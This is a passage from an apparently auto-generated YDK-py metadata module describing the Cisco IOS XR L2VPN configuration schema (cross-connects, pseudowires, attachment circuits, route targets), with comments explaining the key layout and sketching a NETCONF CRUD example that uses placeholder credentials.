'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('prefix', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Target Prefix
''',
'prefix',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('sacid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Source AC ID
''',
'sacid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routed',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
False,
[
_MetaInfoClassMember('pseudowire-routed', REFERENCE_LIST, 'PseudowireRouted' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
[], [],
''' Pseudowire configuration
''',
'pseudowire_routed',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routeds',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
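    # The pseudowire-routed list above is keyed by the full target
    # attachment identifier of a routed pseudowire - Global ID, IPv4 prefix
    # and target AC ID, plus the source AC ID - which matches the AII Type 2
    # addressing (global-id:prefix:ac-id) of RFC 5003 used for dynamically
    # placed multi-segment pseudowires. This reading is an inference from
    # the key layout; the model itself does not cite the RFC.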
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable attachment circuit interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
False,
[
_MetaInfoClassMember('attachment-circuit', REFERENCE_LIST, 'AttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 38)], [],
''' Name of the point to point xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attachment-circuits', REFERENCE_CLASS, 'AttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-attachment-circuits', REFERENCE_CLASS, 'BackupAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
[], [],
''' List of backup attachment circuits
''',
'backup_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('monitor-sessions', REFERENCE_CLASS, 'MonitorSessions' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
[], [],
''' List of Monitor session segments
''',
'monitor_sessions',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
                    ''' Cross connect description name
''',
'p2p_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-evpns', REFERENCE_CLASS, 'PseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-routeds', REFERENCE_CLASS, 'PseudowireRouteds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
[], [],
''' List of pseudowire-routed
''',
'pseudowire_routeds',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowires', REFERENCE_CLASS, 'Pseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
[], [],
''' List of pseudowires
''',
'pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
False,
[
_MetaInfoClassMember('p2p-xconnect', REFERENCE_LIST, 'P2PXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
[], [],
''' Point to point xconnect
''',
'p2p_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
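    # Putting the pieces together: a point-to-point cross-connect pairs one
    # attachment circuit with one pseudowire inside a named group. A sketch,
    # assuming a conventional YDK-py CRUD session (device address,
    # credentials and the lower-level handle names are placeholders):
    #
    #   from ydk.providers import NetconfServiceProvider
    #   from ydk.services import CRUDService
    #   from ydk.types import Empty
    #   from ydk.models.cisco_ios_xr import Cisco_IOS_XR_l2vpn_cfg as l2vpn_cfg
    #
    #   l2vpn = l2vpn_cfg.L2Vpn()
    #   group = l2vpn.database.xconnect_groups.XconnectGroup()
    #   group.name = 'XG1'                            # key, length 0..32
    #   p2p = group.p2p_xconnects.P2PXconnect()
    #   p2p.name = 'XC1'                              # key, length 0..38
    #   ac = p2p.attachment_circuits.AttachmentCircuit()
    #   ac.name = 'GigabitEthernet0/0/0/1'            # key, interface name
    #   ac.enable = Empty()                           # empty leaf
    #   p2p.attachment_circuits.attachment_circuit.append(ac)
    #   group.p2p_xconnects.p2p_xconnect.append(p2p)
    #   l2vpn.database.xconnect_groups.xconnect_group.append(group)
    #
    #   provider = NetconfServiceProvider(address='10.0.0.1',
    #                                     username='admin', password='admin')
    #   CRUDService().create(provider, l2vpn)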
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
                    ''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
                    ''' Route distinguisher type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('import', ATTRIBUTE, 'str' , None, None,
[], [],
''' Import route policy
''',
'import_',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
                    ''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
                    ''' Role of the route target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
False,
[
_MetaInfoClassMember('mp2mp-route-target', REFERENCE_LIST, 'Mp2MpRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
[], [],
''' Name of the Route Target
''',
'mp2mp_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Remote Customer Edge Identifier
''',
'remote_ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
False,
[
_MetaInfoClassMember('remote-ceid-attachment-circuit', REFERENCE_LIST, 'RemoteCeidAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
[], [],
''' AC And Remote Customer Edge Identifier
''',
'remote_ceid_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
False,
[
_MetaInfoClassMember('ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Customer Edge Identifier
''',
'ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ceid-attachment-circuits', REFERENCE_CLASS, 'RemoteCeidAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
[], [],
''' AC And Remote Customer Edge Identifier
Table
''',
'remote_ceid_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
False,
[
_MetaInfoClassMember('ceid', REFERENCE_LIST, 'Ceid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
[], [],
''' Local Customer Edge Identifier
''',
'ceid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceids',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
False,
[
_MetaInfoClassMember('ce-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Customer Edge Identifier
''',
'ce_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ceids', REFERENCE_CLASS, 'Ceids' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
[], [],
''' Local Customer Edge Identifier Table
''',
'ceids',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable signaling protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable auto-discovery
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-policy', REFERENCE_CLASS, 'Mp2MpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
[], [],
''' Route policy
''',
'mp2mp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-targets', REFERENCE_CLASS, 'Mp2MpRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
[], [],
''' Route Target
''',
'mp2mp_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-signaling-protocol', REFERENCE_CLASS, 'Mp2MpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
[], [],
''' signaling protocol in this MP2MP
''',
'mp2mp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
